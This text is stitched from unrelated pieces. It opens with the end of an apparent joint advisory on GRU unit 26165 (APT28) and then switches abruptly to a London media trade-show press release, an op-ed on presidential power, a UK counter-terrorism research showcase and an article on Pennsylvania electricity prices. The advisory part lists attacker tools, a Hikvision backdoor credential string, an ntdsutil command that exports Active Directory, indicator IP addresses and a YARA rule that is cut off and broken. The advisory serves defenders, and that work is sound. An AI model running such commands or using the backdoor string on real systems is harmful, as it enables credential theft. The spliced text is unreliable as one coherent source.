Note: Specific IoCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes. Care should be taken when basing triaging logs or developing detection rules on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report.
Utilities and scripts
Legitimate utilities
Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:
ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory
wevtutil – A legitimate Windows executable used by threat actors to delete event logs
vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive
ADexplorer – A legitimate window executable to view, edit, and backup Active Directory Certificate Services
OpenSSH – The Windows version of a legitimate open source SSH client
schtasks – A legitimate Windows executable used to create persistence using scheduled tasks
whoami – A legitimate Windows executable used to retrieve the name of the current user
tasklist – A legitimate Windows executable used to retrieve the list of running processes
hostname – A legitimate Windows executable used to retrieve the device name
arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment
systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information
net – A legitimate Windows executable used to retrieve detailed user information
wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives
cacls – A legitimate Windows executable used to modify permissions on files
icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership
ssh – A legitimate Windows executable used to establish network shell connections
reg – A legitimate Windows executable used to add to or modify the system registry
Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, Identifying and Mitigating Living Off the Land Techniques, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.
Malicious scripts
Certipy – An open source python tool for enumerating and abusing Active Directory Certificate Services
Get-GPPPassword.py – An open source python script for finding insecure passwords stored in Group Policy Preferences
ldap-dump.py – A script for enumerating user accounts and other information in Active Directory
Hikvision backdoor string: “YWRtaW46MTEK”
Suspicious command lines
While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:
edge.exe “-headless-new -disable-gpu”
ntdsutil.exe “activate instance ntds” ifm “create full C:temp[a-z]{3}” quit quit
Disclaimer: These IP addresses date June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
June 2024
July 2024
August 2024
192[.]162[.]174[.]94
207[.]244[.]71[.]84
31[.]135[.]199[.]145
79[.]184[.]25[.]198
91[.]149[.]253[.]204
103[.]97[.]203[.]29
162[.]210[.]194[.]2
31[.]42[.]4[.]138
79[.]185[.]5[.]142
91[.]149[.]254[.]75
209[.]14[.]71[.]127
46[.]112[.]70[.]252
83[.]10[.]46[.]174
91[.]149[.]255[.]122
109[.]95[.]151[.]207
46[.]248[.]185[.]236
83[.]168[.]66[.]145
91[.]149[.]255[.]19
64[.]176[.]67[.]117
83[.]168[.]78[.]27
91[.]149[.]255[.]195
64[.]176[.]69[.]196
83[.]168[.]78[.]31
91[.]221[.]88[.]76
64[.]176[.]70[.]18
83[.]168[.]78[.]55
93[.]105[.]185[.]139
64[.]176[.]70[.]238
83[.]23[.]130[.]49
95[.]215[.]76[.]209
64[.]176[.]71[.]201
83[.]29[.]138[.]115
138[.]199[.]59[.]43
70[.]34[.]242[.]220
89[.]64[.]70[.]69
147[.]135[.]209[.]245
70[.]34[.]243[.]226
90[.]156[.]4[.]204
178[.]235[.]191[.]182
70[.]34[.]244[.]100
91[.]149[.]202[.]215
178[.]37[.]97[.]243
70[.]34[.]245[.]215
91[.]149[.]203[.]73
185[.]234[.]235[.]69
70[.]34[.]252[.]168
91[.]149[.]219[.]158
192[.]162[.]174[.]67
70[.]34[.]252[.]186
91[.]149[.]219[.]23
194[.]187[.]180[.]20
70[.]34[.]252[.]222
91[.]149[.]223[.]130
212[.]127[.]78[.]170
70[.]34[.]253[.]13
91[.]149[.]253[.]118
213[.]134[.]184[.]167
70[.]34[.]253[.]247
91[.]149[.]253[.]198
70[.]34[.]254[.]245
91[.]149[.]253[.]20
Detections
Customized NTLM listener
rule APT28_NTLM_LISTENER {
meta:
description = "Detects NTLM listeners including APT28's custom one"
( any of ($sysinternals_*) and any of ($psexec_*) )
or
( 2 of ($network_*) and 2 of ($psexec_*))
)
}
The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G0007 and commonly used within the cybersecurity community:
Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.
Further Reference
To search for the presence of malicious email messages targeting CVE-2023-23397, network defenders may consider using the script published by Microsoft: https://aka.ms/CVE-2023-23397ScriptDoc.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Contact
United States organizations
National Security Agency (NSA)
Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)
U.S. organizations are encouraged to reporting suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (report@cisa.gov or 888-282-0870), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact.
Department of Defense Cyber Crime Center (DC3)
United Kingdom organizations
Germany organizations
Czech Republic organizations
Poland organizations
Australian organizations
Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
Canadian organizations
Estonia organizations
French organizations
French organizations are encouraged to report suspicious activity or incident related to information found in this advisory by contacting ANSSI/CERT-FR by email at cert-fr@ssi.gouv.fr or by phone at: 3218 or +33 9 70 83 32 18.
See Table 2 through Table 14 for all the threat actor tactics and techniques referenced in this advisory.
Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access.
Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices.
Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target.
External actors could send specially crafted emails that cause a connection from the victim to an untrusted location of the actor’s control, leaking the Net-NTLMv2 hash of the victim that the actor could then relay to another service to authenticate as the victim.
An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php.
Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php.
Appendix C: MITRE D3FEND Countermeasures
Table 16: MITRE D3FEND countermeasures
Countermeasure Title
ID
Details
Network Isolation
Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers.
Access Mediation
Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access.
Inbound Traffic Filtering
Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement.
Resource Access Pattern Analysis
Use automated tools to audit access logs for security concerns and identify anomalous access requests.
Outbound Traffic Filtering
Block NTLM/SMB requests to external infrastructure.
Platform Monitoring
Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers.
System File Analysis
Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly.
Application Hardening
Enable optional security features in Windows to harden endpoints and mitigate initial access techniques.
Application-based Process Isolation
Enable attack surface reduction rules to prevent executable content from email.
Executable Allowlisting
Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%.
Execution Isolation
Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts.
Application Configuration Hardening
Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.).
Process Spawn Analysis
Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters.
URL Reputation Analysis
Use services that provide enhanced browsing services and safe link checking.
Network Access Mediation
Do not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible.
Do not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors.
Domain Name Reputation Analysis
Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.
Multi-factor Authentication
Use MFA with strong factors and require regular re-authentication, especially for management accounts.
Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts.
User Account Permissions
Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected.
Token-based Authentication
Reduce reliance on passwords; instead, consider using services like single sign-on.
Credential Hardening
Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts.
Authentication Event Threshholding
Use account throttling or account lockout. Throttling progressively increases time delay between successive login attempts. If using account lockout, allow between 5 to 10 attempts before lockout.
Strong Password Policy
Use a service to check for compromised passwords before using them.
Credential Rotation
Change all default credentials.
Encrypted Tunnels
Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices.
Software Update
Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life.
Agent Authentication
Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only.
User Behavior Analysis
Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.
The UK’s most powerful hub for the creative industries united for two days of engaged networking, passionate debate and exceptional insights into AI, the creator economy, production craft and more – helping attendees stay ahead-of-the-curve for the year ahead.
London, United Kingdom, 21 May 2025 – After two exceptional days of conversation, collaboration and community, the biggest and buzziest MPTS yet welcomed a record 13,000 attendees from 50 countries, uniting the UK’s media and entertainment industry together in the heart of London, like never before. The exhibition is organized by Media Business Insight (MBI) Ltd, a GlobalData company.
Hosted at London’s Olympia on 14-15 May, the red-hot editorially driven program delivered 100+ free-to-attend sessions across eight theatres, showcasing the insight and passion of more than 350 expert speakers and guest keynotes. The bustling show floor was packed with more than 300 exhibitors and sponsors, showcasing imagination, determination and standout talent of the UK’s creative and technical communities – at a time of both global challenge and immense opportunity.
Setting the agenda for MPTS, a State of the Nation Production keynote outlined a media and entertainment landscape in which storytellers had to embrace screens, formats and creators of all kinds.
Kate Beal, CEO, Woodcut Media, asserted: “TV doesn’t exist anymore in the way we knew it.”
Derren Lawford, CEO, Dare Pictures, said: “We are in the middle of a decade of profound transition, and we are past the tipping point. TV is part of a wider, connected series of industries around the creation and distribution and funding of content.”
Headliners at MPTS include:
Producer and presenter Ross Kemp, who took us on an exhilarating tour of investigative documentaries on the front lines of conflict, drug cartels and organised crime gangs. “They will know in a second if you are not telling the truth,” he said. “I specialize in telling the truth, it is as simple as that.”
Georgie Holt, whose company Flight Story produces the world’s second biggest podcast ‘Diary of a CEO’, declared: “We are in the era of the Founder Creator — creators who are now in charge of media content and able to monetise spectacularly outside of traditional gatekeepers.”
NFL professional turned American Football broadcaster Jason Bell explained how sports coverage was evolving into the F1 Drive To Survive model, in which athlete personalities and back stories were the keys to growing audiences.
Blockbuster editor Eddie Hamilton gave a masterclass about the precision involved in making Top Gun: Maverick and five Mission: Impossible movies with Tom Cruise. He said: “Every nuance is refined hundreds of times. Sometimes we watch a 10-minute scene 40 times in a day, checking to see where your eye is moving in the frame.”
Diverse representation is a vital sign of the industry’s health and MPTS is proud to set the benchmark to secure equal representation and attendance from the next generation, not only across the program, but also something clearly witnessed across the show floor amongst exhibitors and attendees.
MPTS also prioritizes the crucial importance of sustainability and, in continuing association with BAFTA albert brought this conversation to the fore with experts including Peter Okell, Sky Studios Elstree; Luke Seraphin, Sky Studios and Claire O’Neill, A Greener Future speaking in the Sustainability Series.
Sam Street, Marketing Officer, BAFTA Albert commented: “MPTS is a really key moment in our calendar. It is always so great to connect with suppliers, companies, studios and creatives who share our common passion for sustainability within screen industries. It has also been really valuable to curate our sustainability series of panels across this year’s show, we’ve had some really insightful discussions and emphasised the importance of environmental focus throughout the screen industries.”
We did not need a machine to predict the high demand for news and information about AI. The brand-new ticketed AI Training program and the expanded AI Media Zone drew exceptional attendance, with exhibitors such as Dot Group, Moments Lab and Software. Conversations in these packed-out sessions revolved around the impact of AI from ideation to VFX, featuring real-world insights and discussions on bridging the gap between theory and practice from speakers including Pete Archer, BBC; Jon Roberts, ITN and Damien Viel, Banijay Entertainment.
With a record number of exhibitors already rebooking for 2026, MPTS continues to prove its value as the UK’s number one event for media and production professionals, where brands, creatives and decision-makers come together to connect, collaborate and grow.
Jane Shepard, Senior Channel Marketing Manager, Sandisk, said: “MPTS 2025 was a spectacular showcase of innovation, bringing together the brightest minds and cutting-edge technology in the industry. An unforgettable experience for all attendees.”
Tom Rundle, Application Engineer, Yamaha Music, said: “It has been very busy for us. We have seen a huge mix of customers from the broadcast sector here, but also customers from the other industries which we serve, whether that’s live or theatre who have deliberately come to the show to seek us out to speak to us. Will we be back next year? Yes, absolutely, this is the first year for us, so it was always a bit of a toe in the water, but it’s been vastly more successful than we thought it was going to be.”
Peter Alderson, Business Manager, Nikon, said: “This is our second year at MPTS, we’ve gone a little bit bigger on our stands, almost doubling it, and I think it’s definitely been worthwhile doing. We’ve partnered with RED, who we recently purchased, and MRMC so it’s making a lovely statement about where we are in the market, and I think we’re in the right place to make that statement here at MPTS.”
Jennifer Hudson, Marketing Executive, Videndum, said: “This show is really important in our calendar – we attend nearly every year and find so much value in it. We get to meet with so many different professionals within the industry, and this year has been really, really positive for us. We’ve walked away with quite a few leads and made new relationships. It’s a fantastic show, and we would thoroughly recommend anyone thinking about coming and having a stand here to definitely do it – you won’t regret it.”
Will Pitt, Head of Sales Solutions, Techex, said: “My impression of the show is that it’s been incredibly busy and very positive. Techex particularly specialise in solving some of the headaches that a lot of the broadcast industry is grappling with at the moment, namely, how they transition into an IP-led architecture from a legacy architecture and what that journey looks like. As such, our standards have been packed pretty much throughout the show to come and look at products, but also to come and talk about ideas and lean into what that journey looks like specifically for them. So not a generic journey, but specific to their drivers and their wants and needs in the short and medium term. We particularly like MPTS because it’s London based and many of the engineers that we speak to and collaborate with are based here and therefore it’s an easy journey for them to take half a day, a day out to come and investigate what we have to offer, but also to have those conversations. And so for organisations like WBD or Sky, the BBC, ITV, etc. They can come here quite easily and engage with us, spend some time talking in real life and not over teams or Zoom.”
Charlotte Wheeler, Event Director, MPTS said: “Without doubt, 2025 was the most stimulating, ahead-of-the-curve MPTS yet. At a time when we are seeing the industry under real pressure from budget cuts to talent shortages and perpetual change, the conversations and connections on the show floor were positive and demonstrated infectious community spirit. The level of attendance and the quality of attendees from across all sectors of the industry was incredible – not just stakeholders in technology but representatives from production and commissioning, the creator economy, those new to the industry and freelancers were all brought together by MPTS under one roof.
“A huge amount of work goes into making sure that there is equal representation across our extensive conference programme. I am proud that MPTS is one of – if not the – most diverse shows both in terms of attendees and panellists.
“Thank you to everyone for exhibiting, sponsoring, speaking, attending and engaging with the show to make MPTS such a thrilling success. We are already planning for 2026, which marks MPTS’ 10th edition, so look forward to a landmark celebration!”
Save the date for MPTS 2026 when we return to Olympia Grand Hall, London on 13 – 14 May 2026.
The conversation does not stop when the doors close. MPTS is more than just two days a year – it is a connected, year-round community for the broadcast and media industry. From on-demand content to exclusive events, there’s still so much to explore. Stay connected with us: https://www.mediaproductionshow.com/register-interest
Source: The Conversation – USA – By Andrew Reeves, Professor of Political Science and Director of the Weidenbaum Center, Washington University in St. Louis
At his inauguration on Jan. 20, 2025, Donald Trump swore to ‘preserve, protect and defend the Constitution of the United States.’Morry Gash/POOL/AFP, Getty Images
Lately, the headlines have been clear: President Donald Trump is headed for a showdown with the courts. If he ignores their rulings, the courts have few tools and limited power to make him comply.
But the real contest is not legal. It is political.
But law alone has never been enough to prevent presidents from abusing their power. The law’s force depends on political will. Presidents often follow the law not simply because they must, but to avoid backlash from Congress, the media or the public.
What the United States is witnessing in 2025 is not just a president testing the system. It is a transformation of the presidency into a fully political institution. The president acts until political resistance becomes strong enough to stop him.
President Donald Trump criticizes judges whose decisions he doesn’t like.
Testing the limits
These political constraints are informal and fluid.
They arise from public opinion, media scrutiny, pressure from party leaders and other elected officials, and the threat of electoral consequences. While legal rules rely on institutions, political limits depend on reputation, norms and the willingness of others to resist.
Trump’s presidency operates within this second framework. Legal boundaries are still present, but they are often treated by his administration as optional and without deference.
These are not isolated incidents. Taken together, they reveal a broader pattern.
Trump appears to treat legal rules not as limits but as obstacles to be negotiated or ignored. One recent scholarly paper has described Trump’s approach as “legalistic noncompliance,” where the administration uses the language of law to give the appearance of compliance while defying the substance of court orders.
In a February 2025 national survey by the Weidenbaum Center, a research institute that I head at Washington University, just 21% of Americans said the president should be able to enact major policy without Congress. The public does not support unchecked presidential power: A further 25% of respondents, including more than one-third of Republicans, neither agreed nor disagreed that a president should have this type of unchecked power. Of those with an opinion, a solid 72% of Americans oppose unilateral presidential action, including 90% of Democrats, 76% of independents and 42% of Republicans.
These findings align with nine earlier national surveys conducted during the Obama and Trump administrations. Jon Rogowski and I report these results in our book, “No Blank Check.”
But one important shift stands out in the recent survey. Support for unilateral executive action among the two-thirds of Republicans who expressed an opinion has reached an all-time high, with 58% of them endorsing presidential action without Congress. That is more than 16 points higher than in any previous wave.
Despite that rise in partisan support, Trump’s broader political position remains weak.
Congressional Republicans continue to offer public support, but many are watching their own polling numbers closely as the midterms approach.
If the economy falters and public opinion turns more sharply against the president, political resistance could grow. I believe that’s when legal rules may begin to matter again – not because they carry new force, but because violating them would carry higher political costs.
Real test still ahead
So far, no judge has held the Trump administration in contempt of court. But the signs of erosion are unmistakable. Trump recently accused the Supreme Court of “not allowing me to do what I was elected to do” after it temporarily blocked his administration’s effort to deport migrants with alleged ties to Venezuelan gangs. Treating the judiciary as just another political adversary and ignoring its rulings risks an even deeper constitutional crisis.
The most meaningful check on presidential power will be political.
Courts rely on the broader political system for enforcement. That support can take many forms: elected officials speaking out in defense of the rule of law; Congress using its oversight and funding powers to uphold court rulings; bureaucrats refusing to implement unlawful directives; and a press and public that demand compliance. Without that support, even the clearest legal decisions may be ignored.
The legal fights unfolding today are serious and must be watched closely. But Trump is not focused on the courts. He is focused on politics – on how far he can go, and whether anyone will make him stop.
Andrew Reeves is affiliated with Washington University in St. Louis and the Hoover Institution.
Source: United Kingdom – Executive Government & Departments
Case study
Flies, crossbows and comics: novel counter terrorism innovation
Nine projects, ranging from whether flies can detect explosives to how comics can reduce radicalism and how much of a risk crossbows are, were showcased.
More than 100 people attended the third University Innovation Concept event exploring ways in which cutting-edge research, often in unexpected areas, can help fight terrorism.
Nine fascinating and thought-provoking projects, ranging from whether flies can detect explosives (yes!) to how comics can reduce radicalism, and how much of a terrorism risk crossbows are, were on display at a showcase at the Open University in Milton Keynes, in which the Accelerated Capability Environment (ACE) was a proud partner.
Researchers and delegates were welcomed by Inspector Liam Cahill, Innovation Domain Lead at the Counter Terrorism Research Lab (CTRL), and Open University professors Arosha K Bandara and Eleanor Crabb. Annette Southgate, Head of ACE, then took to the stage to stress the importance of work and innovative collaboration such as this to “getting ahead of some of the people that are trying to cause us harm”.
Iain Harrison, Director of Digital, Data, Analysis & Technology at Counter Terrorism Policing, explained the rigorous process, supported by ACE, that began with 62 proposals from 28 different universities, which were then reviewed and whittled down to the nine stimulating ideas on display at the showcase event.
Bringing academia and Counter Terrorism Policing together
The projects that had been explored over 12 weeks of intensive research were showcased across three themes:
THEME ONE: Radicalisation and Interventions
First to present were a team from Anglia Ruskin University, on the topic of Exploring the Impact of Critical World Events on Extremist Misinformation Network (2020-24). This involved analysing 240 posts from four major platforms to understand how extremist groups exploit global crises on popular social media platforms, using hashtags and multiple forms of misinformation to amplify uncertainty and try and recruit new audiences. It also looked to pinpoint potential novel ways to intervene in this process.
Next up were a team from Cranfield University, analysing how social media content algorithms respond to user interactions within specific topics, to answer the question of Can Social Media Algorithms Radicalise? This pilot was designed to quantify if user behaviours such as watching or liking videos influenced a popular platform’s algorithm, and to what extent. The conclusion was that the algorithm could be influenced to provide more content around a particular theme, but it is not yet clear how long this influence lasts.
The final presentation in this first session was from the University of Liverpool, exploring the topic of Graphic Novels to Enable Discussion and Promote Critical Thinking. This project involved creating a 46-page book containing four graphic novels on the topic of radicalisation, supported by front-line intervention practitioners, for use in educational strategies to encourage critical thinking. Comics were chosen because they are already popular worldwide, accessible and engaging as a format, and cheap to produce.
THEME TWO: Current Threats, Biosensors and Human Networks
After a break, another team from Cranfield University, that had been drawing big crowds in the breakout sessions for the four crossbows on display at their stand, spoke on their research into Crossbows: A Real and Current Threat. Against a background of increasing use of crossbows, which can legally be bought by anyone over the age of 18, in targeted incidents, this set out to examine the hit probability and wounding potential of four different systems, their reload times, and how these compared to current policing response times. The conclusions, from a variety of tests including depth of penetration and discharge rate, concluded that crossbows need to be considered a real and present threat for a marauding terrorist attack, because all of those tested have potential to cause significant injury, especially to unprotected organs.
Next up was another project that had the audience buzzing – research from a team at The Open University on Fruit Fly Biosensors: Leveraging Olfactory Responses for Detection of Explosives and Toxic Chemicals. This explored if fruit flies, which have exceptional sensitivity, could be used as biosensors to detect toxins, drug precursors and explosives. The answer was potentially yes – experiments with TNT found that exposure to the explosive led to a gradual but clear increase in fly attraction, indicating that fruit flies can detect it. Preliminary lab data also suggests starving the flies may enhance TNT detection speed.
The final project in this session was an explanation of a Dynamic Target Indicator Tool (D-TinT) developed by a team at the University of Exeter. This uses techniques from movement pattern analytics and social network analysis to identify the best indicators of links between nodes in a human network based on movement patterns over time. This enables a statistical and spatial mathematical model to be developed. The Tool also identifies what might be flagged as a vulnerable target – either person or place – which could allow counter terrorism stakeholders to test the impact of possible risk-reduction procedures.
THEME THREE: Emerging Technologies
The final session of a highly enjoyable day started with a team from Robert Gordon University in Aberdeen talking the audience through their research on Leveraging Artificial Intelligence (AI) to Identify and Prevent Terrorism in Prisons: Legislative Gaps and Technological Solutions. This analysed AI’s role in situational awareness and radicalisation prevention, explored how it could support existing counterterrorism efforts, evaluated legal and ethical readiness for AI to be deployed in this way, and proposed technical and legal reforms to enable the responsible use of AI technologies in prison settings. The conclusion of the research was that AI offers significant potential to enhance security and counter-radicalisation efforts in UK prisons.
Next, a scoping study of Augmented Reality and Terrorism was presented by Dr Richard Jones of Edinburgh Law School, part of the University of Edinburgh. Billing augmented reality as a “technology in search of a purpose”, his research explored both potential law enforcement applications, such as head-up real-time navigation and facial recognition of persons of interest, as well as how terrorists could use the same technology, for example to create video footage for propaganda purposes. It also looked at how this technology could evolve in the public domain. The research concluded that feasibility factors include device cost and availability as well as the level of required technological expertise, which is likely to fall, in addition to utility and whether it solves a problem.
The final presentation of the day was by a team from the University of Southampton on Exploiting Vulnerabilities in Autonomous Vehicle Systems for Terrorist Activity – Threats to UK Critical National Infrastructure. This focused on identifying vulnerabilities in autonomous vehicle systems amid increasing reliance on connected and automated vehicles, analysing how terrorists could exploit these to disrupt or control them. This could include by hijacking the vehicle controls or causing collisions via manipulating road signs. The conclusion was that proactive risk mitigation is paramount.
Following the event, Inspector Cahill said: “The University Innovation Concept (UIC) was conceived with the intention of bringing Counter Terrorism Policing and academia closer together to ensure operational decisions made by experienced and knowledgeable personnel are backed by science and academic rigour.
“The one-day showcase was also a fantastic opportunity for attendees to network, learn about ongoing research and potentially take learning back to their operational roles, and feedback has been extremely positive.”
Reflecting on the event, Professor Southgate said: “ACE is proud to support policing colleagues find new and creative ways of solving frontline mission problems through partnership with researchers from across a diversity of backgrounds and institutions.
“Accessing diversity of thought, approach and experience helps us step back and consider more impactful and enduring ways of tackling existing and sometimes long-standing problems.
“We are keen to help identify and shine a light on brilliant academic work that can already help solve today’s mission problems; highlighting the difference this makes, help build relationships and continue encouraging our talented academic community to support frontline policing work.”
High electricity consumption from data centers and other sources of rising demand will likely cause further increases in the near future.
The impact on consumers is particularly dramatic in Pennsylvania, where rate hikes are widespread.
For example, the monthly bill for a PECO residential customer who uses 700 kilowatt hours of electricity monthly increased 10% – or US$13.58 – in 2025. These bills will go up another $2.70 each month in 2026.
Retail price adjustments approved by the Pennsylvania Public Utility Commission for most electric distribution utilities effective December 2024 led to higher bills for many customers across the state. In some parts of Pennsylvania, the estimated increases topped an estimated 30%.
But Pennsylvania faces distinct challenges related to its electric grid – the maze of wires and generators – that drive both the growing demand for electricity and the limited supply.
PJM and the electric grid
Pennsylvania power plants produce a lot of electricity. In fact, the Keystone State is the the largest exporter of electricity in the U.S. and has been for many years.
But the electricity Pennsylvania produces doesn’t always stay in state.
That’s because Pennsylvania’s electric grid is managed by a company called PJM. PJM coordinates the flow of electricity through all or parts of 13 states and the District of Columbia, and it ensures the wholesale electricity transmission system operates reliably and safely.
Pennsylvania electric utilities, such as PECO or Duquesne Light, then distribute this wholesale electricity to retail customers, including homeowners and renters.
PJM requires the utilities to ensure ahead of time that they can meet their customers’ future electricity demands, including during heat waves and winter storms. This requirement is met using a market called a “capacity auction,” in which electricity suppliers bid to provide physical infrastructure that will generate electricity in the future.
The prices at the 2025-2026 PJM capacity auction were more than 800% higher than the previous year, in part due to the growing demand for electricity within PJM. This amounts to tens of billions of dollars in extra costs.
Power plants in Pennsylvania can’t simply stop exporting electricity and supply more in-state power because they dispatch their power into the regional grid operated by PJM, and the flow of electricity is dictated by the physical structure of this grid.
Pennsylvania shares an electric grid with northern Virginia, considered the largest data center market in the world. Nathan Howard via Getty Images
Much of this new demand comes from data centers, which support everything from AI applications and data storage – think of the thousands of emails and files backed up on our computers – to sports betting, online retailers such as Amazon, and national security applications such as the North American Aerospace Defense Command.
The increase in electricity demand within PJM is happening at the same time that supply is shrinking.
Many old generating plants in the PJM grid are retiring as they near the end of their useful lives and become less profitable for plant operators, particularly as natural gas and solar become more affordable. Some of these older power plants also emit a lot of pollution and are costly to retrofit to meet current pollution limits.
Beyond the challenge of plant retirements, PJM has been slow to allow hundreds of new proposed power plants – most of them solar- and battery-based – to connect to transmission lines.
This long “interconnection queue” prevents new, needed generation from coming online. This is happening even though companies are eager and ready to build more generation and battery storage.
Aging infrastructure and growing weather extremes
One of the primary recent drivers of high consumer electric bills is that the utilities have been slow to upgrade their aging wires.
In response to rising electricity prices, Pennsylvania Gov. Josh Shapiro filed a legal complaint with the Federal Energy Regulatory Commission against PJM in December 2024. This complaint blamed PJM’s capacity auction design for creating unnecessary costs for consumers.
According to the settlement reached after the complaint, PJM’s price caps will be 35% lower at the next major capacity auction. This reduction in wholesale prices could limit retail price increases.
But this is at best a temporary fix. It doesn’t address the increasing demand, aging power infrastructure battered by extreme weather, or transmission bottleneck.
In order for Pennsylvania residents to see lower electric bills anytime soon, more changes are needed. For example, many expertspreviously observed that PJM needs to fix the queue and get online the many power plants that are ready to build and just waiting for a transmission interconnection.
While PJM has reformed its queue process, the queue is still long. New power plants are not going up fast enough, in part due to additional challenges such as local opposition and supply chain and financing issues.
Hannah Wiseman receives or has recently received funding from the Alfred P. Sloan Foundation, Arnold Ventures, U.S. National Science Foundation, U.S. Department of Energy, Center for Rural Pennsylvania, and the Pennsylvania Department of Environmental Protection. She is a member of the Center for Progressive Reform.
Seth Blumsack receives or has recently received funding from the Alfred P. Sloan Foundation, Heising Simons Foundation, U.S. National Science Foundation, U.S. Department of Energy, NASA, U.S. Federal Aviation Administration, Center for Rural Pennsylvania and the Pennsylvania Department of Environmental Protection.